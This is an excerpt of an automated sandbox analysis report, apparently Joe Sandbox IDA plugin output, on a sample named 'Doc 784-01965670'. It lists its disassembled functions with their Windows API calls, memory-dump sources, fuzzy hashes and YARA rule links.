                                                                                                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00466CFE
                                                                                                                                    • _wcslen.LIBCMT ref: 00466D1D
                                                                                                                                    • _memset.LIBCMT ref: 00466BEE
                                                                                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                    • _wcslen.LIBCMT ref: 00466D4B
                                                                                                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00466D9E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen$FileName_memset_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                                                                    • String ID: X$HH
                                                                                                                                    • API String ID: 3021350936-1944015008
                                                                                                                                    • Opcode ID: 148ffd08a53066c169799d7010fd2328abbb1436974d200da898f01e024381e3
                                                                                                                                    • Instruction ID: 73e83d7ea4d12cbe09e247b0b8120e99e9ae8af51722f6ce2f45a1bbad6557a4
                                                                                                                                    • Opcode Fuzzy Hash: 148ffd08a53066c169799d7010fd2328abbb1436974d200da898f01e024381e3
                                                                                                                                    • Instruction Fuzzy Hash: D1C1B2715043408BC714EF65C981A9FB3E4BF84304F15892FF949AB292EB78E905CB9B
                                                                                                                                    Function 0045F48E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 226windowsleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 0045F4AE
                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F519
                                                                                                                                    • SetMenuItemInfoW.USER32(00000008,00000004,00000000,?), ref: 0045F556
                                                                                                                                    • Sleep.KERNEL32(000001F4,?,?,00000000,?), ref: 0045F568
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InfoItemMenu$Sleep_memset
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 1504565804-4108050209
                                                                                                                                    • Opcode ID: d1fae1760d081b6b8cddc0049297ea6fd0734e9abca2e90a1ac85592b3d85e38
                                                                                                                                    • Instruction ID: 9e8996cb251b45e9fd8013479734a73363ce4640cf951279a7d2fdadd0934edb
                                                                                                                                    • Opcode Fuzzy Hash: d1fae1760d081b6b8cddc0049297ea6fd0734e9abca2e90a1ac85592b3d85e38
                                                                                                                                    • Instruction Fuzzy Hash: E171E3711043406BD3109F54DD48FABBBE8EBD5306F04086FFD8587252D6B9A94EC76A
                                                                                                                                    Function 004556F8 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 216COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DestroyWindow.USER32(?,004A83D8,?), ref: 00455800
                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 00455847
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$CreateDestroy
                                                                                                                                    • String ID: ,$tooltips_class32
                                                                                                                                    • API String ID: 1109047481-3856767331
                                                                                                                                    • Opcode ID: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                                                                                    • Instruction ID: af4df8b80438f92fd5356fe82daba85812243c44dff517d7eb602cf52e2cfce3
                                                                                                                                    • Opcode Fuzzy Hash: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                                                                                    • Instruction Fuzzy Hash: BF719075244704AFE320DB28CC85F7B77E4EB89700F50491EFA8197391E6B5E905CB59
                                                                                                                                    Function 0045CBCC Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _wcsncpy.LIBCMT ref: 0045CCFA
                                                                                                                                    • __wsplitpath.LIBCMT ref: 0045CD3C
                                                                                                                                    • _wcscat.LIBCMT ref: 0045CD51
                                                                                                                                    • _wcscat.LIBCMT ref: 0045CD63
                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000104,?), ref: 0045CD78
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,00000104,?), ref: 0045CD8C
                                                                                                                                      • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDD0
                                                                                                                                    • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDE6
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDF8
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE08
                                                                                                                                    • _wcscpy.LIBCMT ref: 0045CE14
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CE5A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                                                                                    • String ID: *.*
                                                                                                                                    • API String ID: 1153243558-438819550
                                                                                                                                    • Opcode ID: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                                                                                    • Instruction ID: 4b7f18f3392d5c51d0b0bcfc25b88d1348604f1c1aa494fd035d881d108a9fe9
                                                                                                                                    • Opcode Fuzzy Hash: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                                                                                    • Instruction Fuzzy Hash: 0561E5B61043419FD731EF54C885AEBB7E4EB84305F44882FED8983242D67D998E879E
                                                                                                                                    Function 0045510D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 115windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 00455127
                                                                                                                                    • GetMenuItemInfoW.USER32 ref: 00455146
                                                                                                                                    • DeleteMenu.USER32(?,?,00000000), ref: 004551B2
                                                                                                                                    • DeleteMenu.USER32(?,?,00000000), ref: 004551C8
                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 004551D9
                                                                                                                                    • SetMenu.USER32(?,00000000), ref: 004551E7
                                                                                                                                    • DestroyMenu.USER32(?,?,00000000), ref: 004551F4
                                                                                                                                    • DrawMenuBar.USER32 ref: 00455207
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow_memset
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 1663942905-4108050209
                                                                                                                                    • Opcode ID: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                                                                                    • Instruction ID: b4bdd7d0bd4ee66815c45afb4cba49e6688c1fb7c5fb2b704b87d0eb3faa17d4
                                                                                                                                    • Opcode Fuzzy Hash: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                                                                                    • Instruction Fuzzy Hash: F4413B70600A01AFD715DF24D9A8B6B77A8BF44302F40891DFD49CB292DB78EC44CBA9
                                                                                                                                    Function 00415C25 Relevance: 22.7, APIs: 15, Instructions: 236COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __get_daylight__invoke_watson$__gmtime64_s$__getptd_noexit
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1481289235-0
                                                                                                                                    • Opcode ID: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                                                                                    • Instruction ID: 11750150b5911b8a2d77b888e51b7102539fbc40f42687a9f62e69b5342e6946
                                                                                                                                    • Opcode Fuzzy Hash: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                                                                                    • Instruction Fuzzy Hash: 8461B372B00B15DBD724AB69DC81AEB73E99F84324F14452FF011D7682EB78DA808B58
                                                                                                                                    Function 0046FB53 Relevance: 22.7, APIs: 15, Instructions: 176windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 0046FB61
                                                                                                                                    • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 0046FB7A
                                                                                                                                    • SendMessageW.USER32 ref: 0046FBAF
                                                                                                                                    • SendMessageW.USER32 ref: 0046FBE2
                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001), ref: 0046FC1B
                                                                                                                                    • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0046FC3E
                                                                                                                                    • ImageList_Create.COMCTL32(00000020,00000020,00000021,?,00000001), ref: 0046FC51
                                                                                                                                    • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 0046FC73
                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FC97
                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FCA5
                                                                                                                                    • SendMessageW.USER32 ref: 0046FD00
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$IconImageList_$CreateExtractReplace
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2632138820-0
                                                                                                                                    • Opcode ID: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                                                                                    • Instruction ID: f8b2170a3f6480226351c2682443129a31dd3945ebd2779c8b18a40e734619f9
                                                                                                                                    • Opcode Fuzzy Hash: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                                                                                    • Instruction Fuzzy Hash: A461BF70208305AFD320DF14DC85F5BB7E4FB89B14F10492EFA85972D1E7B4A8498B66
                                                                                                                                    Function 00433BAC Relevance: 22.6, APIs: 15, Instructions: 79COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00433BC7
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00433BDE
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00433BF5
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00433C0C
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 00433C23
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00433C3A
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00433C51
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00433C68
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00433C7F
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00433C96
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00433CAD
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00433CC4
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00433CDB
                                                                                                                                    • LoadCursorW.USER32(00000000,00000000), ref: 00433CEF
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00433D06
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CursorLoad
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3238433803-0
                                                                                                                                    • Opcode ID: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                                                                                    • Instruction ID: acd63d7325575073817552101614e6badc0a76bef24473f745c9da0ba21645f6
                                                                                                                                    • Opcode Fuzzy Hash: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                                                                                    • Instruction Fuzzy Hash: 6D310E3058C302FFE7504F50EE0AB1C36A0BB48B47F008C7DF64AA62E0E6F055009B9A
                                                                                                                                    Function 00460ABB Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00460AF5
                                                                                                                                    • _wcslen.LIBCMT ref: 00460B00
                                                                                                                                    • __swprintf.LIBCMT ref: 00460B9E
                                                                                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00460C11
                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00460C8E
                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00460CE6
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00460D21
                                                                                                                                    • GetParent.USER32(?), ref: 00460D40
                                                                                                                                    • ScreenToClient.USER32(00000000), ref: 00460D47
                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00460DBE
                                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00460DFB
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                                                                                    • String ID: %s%u
                                                                                                                                    • API String ID: 1899580136-679674701
                                                                                                                                    • Opcode ID: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                                                                                    • Instruction ID: ed0b46c26cbb3f928a943cd91895a09858176ee0e89b0f6962e21683ef9d2041
                                                                                                                                    • Opcode Fuzzy Hash: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                                                                                    • Instruction Fuzzy Hash: 3AA1CD722043019BDB14DF54C884BEB73A8FF84714F04892EFD889B245E778E946CBA6
                                                                                                                                    Function 0047D5F6 Relevance: 21.2, APIs: 4, Strings: 8, Instructions: 210COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 0047D6D3
                                                                                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                    • StringFromCLSID.OLE32(?,?), ref: 0047D6B5
                                                                                                                                      • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                      • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                    • StringFromIID.OLE32(?,?), ref: 0047D7F0
                                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 0047D80A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeFromStringTask_wcslen$_wcscpy
                                                                                                                                    • String ID: 0vH$CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32$HH
                                                                                                                                    • API String ID: 2485709727-934586222
                                                                                                                                    • Opcode ID: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                                                                                    • Instruction ID: 9b1d76abf7044590dd80f2c514dab21f357569e7696d0ed80310904c07b122bf
                                                                                                                                    • Opcode Fuzzy Hash: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                                                                                    • Instruction Fuzzy Hash: 63714BB5614201AFC304EF25C981D5BB3F8BF88704F108A2EF5599B351DB78E905CB6A
                                                                                                                                    Function 0045DB3E Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 181COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcscpy$Folder_memset$BrowseDesktopFromInitializeListMallocPathUninitialize
                                                                                                                                    • String ID: HH
                                                                                                                                    • API String ID: 3381189665-2761332787
                                                                                                                                    • Opcode ID: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                                                                                    • Instruction ID: 9856a5a3be2a6f4b6f15ab218c20ab076772672eb14c4daba281b2e598c2a196
                                                                                                                                    • Opcode Fuzzy Hash: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                                                                                    • Instruction Fuzzy Hash: E1619AB59043009FC320EF65C88499BB7E9BFC8704F048E1EF98987252D775E849CB6A
                                                                                                                                    Function 00434506 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetDC.USER32(00000000), ref: 00434585
                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00434590
                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 0043459B
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 004345A9
                                                                                                                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
                                                                                                                                    • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                                                    • String ID: (
                                                                                                                                    • API String ID: 3300687185-3887548279
                                                                                                                                    • Opcode ID: 850e4e4f4a3144c0c65e94ebd0f1e451ef245c66964f5ba666016bedf541cb72
                                                                                                                                    • Instruction ID: a007e7ec8c3f390601fcb6226b5fc218b62818acb39bbc9fe8cd9ddeb27b86ed
                                                                                                                                    • Opcode Fuzzy Hash: 850e4e4f4a3144c0c65e94ebd0f1e451ef245c66964f5ba666016bedf541cb72
                                                                                                                                    • Instruction Fuzzy Hash: E4514871508345AFD310CF69C884B6BBBE9EF8A310F14881DFA9687390D7B5E844CB66
                                                                                                                                    Function 0045E41B Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 150COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E463
                                                                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                    • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E480
                                                                                                                                    • __swprintf.LIBCMT ref: 0045E4D9
                                                                                                                                    • _printf.LIBCMT ref: 0045E595
                                                                                                                                    • _printf.LIBCMT ref: 0045E5B7
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
